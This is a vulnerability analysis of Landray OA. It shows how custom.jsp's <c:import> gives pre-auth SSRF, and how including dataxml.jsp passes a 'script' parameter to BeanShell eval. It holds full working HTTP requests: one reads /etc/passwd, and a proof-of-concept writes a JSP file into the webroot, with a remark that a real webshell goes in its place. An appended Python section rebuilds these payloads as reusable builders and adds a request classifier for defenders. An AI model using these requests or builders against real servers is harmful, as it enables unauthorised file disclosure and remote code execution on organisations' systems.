Landray OA pre-auth SSRF + dataxml.jsp RCE vulnerability analysis


SSRF vulnerability

Vulnerable path: /sys/ui/extend/varkind/custom.jsp

The <c:import> tag provides everything the <jsp:include> action tag does, and additionally allows an absolute URL to be included; for example, <c:import> can pull page content from a remote FTP server. Its url attribute is the URL of the resource to import: it may be a relative or an absolute path, and it may point at resources on other hosts. custom.jsp feeds the body.file value of the var request parameter into this url attribute (see the request below), which is what turns the page into an SSRF.

The <c:param> tag is used to specify parameters inside a <c:url> tag and is URL-encoding aware; within <c:param>, the name attribute gives the parameter's name and the value attribute its value.

Reading a file through the SSRF

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1
Content-Length: 42
Pragma: no-cache
Cache-Control: no-cache
Origin: http://1.1.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.1.1.1/sys/ui/extend/varkind/custom.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=060EB9D7EC3DA6E910B89F3D67BAB52C
Connection: close


var={"body":{"file":"file:///etc/passwd"}}

Arbitrary code execution via dataxml.jsp

References:
https://websecuritys.cn/archives/lanling2.html
https://blog.csdn.net/ouyang111222/article/details/48474189

POC

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 526
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip


var={"body":{"file":"/sys/common/dataxml.jsp"}}&s_bean=sysFormulaValidate&script=
import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();&type=int&modelName=test

 

The s_bean parameter value is split and the code loops over the pieces calling getBean (which fetches the instantiated bean by the id or name defined in the Spring XML); finally getDataList is called with the RequestContext.

The POC uses s_bean=sysFormulaValidate, so search for sysFormulaValidate.

The bean is defined in spring.xml.

Find the corresponding jar, put the cursor on getDataList and press Shift twice (IntelliJ IDEA's Search Everywhere); this lands in IXMLDataBean.class.

Find the interface.

You can see that it first reads the script request parameter and then calls parseValueScript.

Following further down:

It first checks whether script is null; if not, it strips special characters and whitespace from the end. It then checks whether the string contains a $; if so, a while loop removes the $ characters.

Finally the pieces are concatenated and passed to interpreter.eval(). bsh (BeanShell) executes Java source dynamically: https://blog.csdn.net/ouyang111222/article/details/48474189

Note that none of the steps above is a sanitiser: trimming trailing characters and deleting $ does nothing to stop arbitrary Java statements from reaching the BeanShell interpreter, so whoever controls script controls code execution in the OA process.

Getting a shell by writing a file

URL-decoded, the script parameter of the POC is the following BeanShell code. It locates the webapp root from the path of the jar that contains bsh.Interpreter (everything before WEB-INF), creates loginx.jsp there and writes the base64-decoded content into it. aGVsbG8= is just "hello", so this POC only proves the write; a real webshell goes in its place. sun.misc.BASE64Decoder only exists on JDK 8 and earlier, so the decoder call has to change on newer runtimes.

import java.lang.*;
import java.io.*;
Class cls = Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");
String path = cls.getProtectionDomain().getCodeSource().getLocation().getPath();
File f = new File(path.split("WEB-INF")[0] + "/loginx.jsp");
f.createNewFile();
FileOutputStream fout = new FileOutputStream(f);
fout.write(new sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));
fout.close();

Why does requesting loginxx.jsp return 200? Because spring.xml permits anonymous access to it.
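The POC request and the write-file script above, rebuilt as an added example that is not code from the original post or from Landray OA. It regenerates the BeanShell script from a template, URL-encodes it the way the POC does (the encoded script in the post decodes to exactly the generated one), and adds a small request classifier of the kind a WAF or reverse proxy would run, flagging both the absolute-URL SSRF through <c:import> and the dataxml.jsp include combined with s_bean and script. The function names, the "ordinary" sample request and the classifier's rules are assumptions made here, not taken from the page.

```python
"""Added example: rebuild the two request bodies from the post and flag them.

Not code from the original post or from Landray OA. The helper names, the
"ordinary" sample and the classifier rules are assumptions made here.
"""
import base64
import json
import re
from urllib.parse import quote, unquote_plus

CUSTOM_JSP = "/sys/ui/extend/varkind/custom.jsp"   # page with <c:import url=...>
DATAXML_JSP = "/sys/common/dataxml.jsp"             # page that hands `script` to BeanShell

# The URL-encoded script exactly as it appears in the post's POC (used to cross-check the builder).
POST_SCRIPT_ENCODED = (
    "import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread()"
    '.getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls'
    ".getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new"
    '%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();'
    "FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc"
    '.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();'
)

# Schemes that make <c:import> fetch something other than a context-relative page.
URL_SCHEME = re.compile(r"^(?:file|http|https|ftp|jar):", re.IGNORECASE)


def ssrf_body(target):
    """POST body for custom.jsp; `target` ends up in the <c:import url=...> attribute."""
    return "var=" + json.dumps({"body": {"file": target}}, separators=(",", ":"))


def beanshell_write_file(filename, content):
    """The post's BeanShell script, parameterised: find the webapp root from the jar
    that holds bsh.Interpreter, create `filename` beside WEB-INF, write `content`."""
    b64 = base64.b64encode(content).decode("ascii")
    return (
        "import java.lang.*;import java.io.*;"
        'Class cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");'
        "String path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();"
        f'File f=new File(path.split("WEB-INF")[0]+"/{filename}");'
        "f.createNewFile();FileOutputStream fout=new FileOutputStream(f);"
        f'fout.write(new sun.misc.BASE64Decoder().decodeBuffer("{b64}"));fout.close();'
    )


def rce_body(script, bean="sysFormulaValidate"):
    """Body that includes dataxml.jsp through the SSRF and passes `script` on to
    parseValueScript() -> interpreter.eval(). quote(safe="") percent-encodes every
    reserved character, including the '+' the post sends as %2B."""
    return (ssrf_body(DATAXML_JSP) + "&s_bean=" + bean + "&script=" + quote(script, safe="")
            + "&type=int&modelName=test")


def decoded_script(encoded):
    """URL-decode a script parameter value back to BeanShell source."""
    return unquote_plus(encoded)


def parse_body(body):
    """Minimal x-www-form-urlencoded parser. Splits on '&' only, so an unencoded ';'
    inside a BeanShell script (as in the post's POC) does not cut the parameter short."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def classify_request(path, body):
    """Findings for one POST (empty list = nothing suspicious). This needs the request
    body, so it belongs in a WAF or reverse proxy, not in an access-log search."""
    findings = []
    if path.split("?", 1)[0] != CUSTOM_JSP:
        return findings
    params = parse_body(body)
    for raw in params.get("var", []):
        try:
            file_ref = json.loads(raw)["body"]["file"]
        except (ValueError, KeyError, TypeError):
            continue                      # not the JSON shape custom.jsp expects
        if not isinstance(file_ref, str):
            continue
        if URL_SCHEME.match(file_ref):
            findings.append("ssrf: <c:import> of absolute URL " + file_ref)
        if file_ref.endswith("dataxml.jsp") and "s_bean" in params and "script" in params:
            findings.append("rce: dataxml.jsp included with s_bean=%s and a script parameter (BeanShell eval)"
                            % params["s_bean"][0])
    return findings


def demo():
    """Constructed sample requests (assumed, not captured traffic) run through the classifier."""
    samples = {
        "read_passwd": ssrf_body("file:///etc/passwd"),
        "getshell": rce_body(beanshell_write_file("loginx.jsp", b"hello")),
        "ordinary": ssrf_body("/sys/ui/extend/varkind/widget.jsp"),   # assumed-benign local include
    }
    return {name: classify_request(CUSTOM_JSP, body) for name, body in samples.items()}


if __name__ == "__main__":
    assert decoded_script(POST_SCRIPT_ENCODED) == beanshell_write_file("loginx.jsp", b"hello")
    for name, findings in demo().items():
        print(name, "->", findings or "no findings")
```

Access logs only record the POST to custom.jsp, so a log-only hunt has to key on that path (especially from unauthenticated sources) followed by requests for .jsp files that are not part of the product; the body-level rules above need a component that actually sees request bodies.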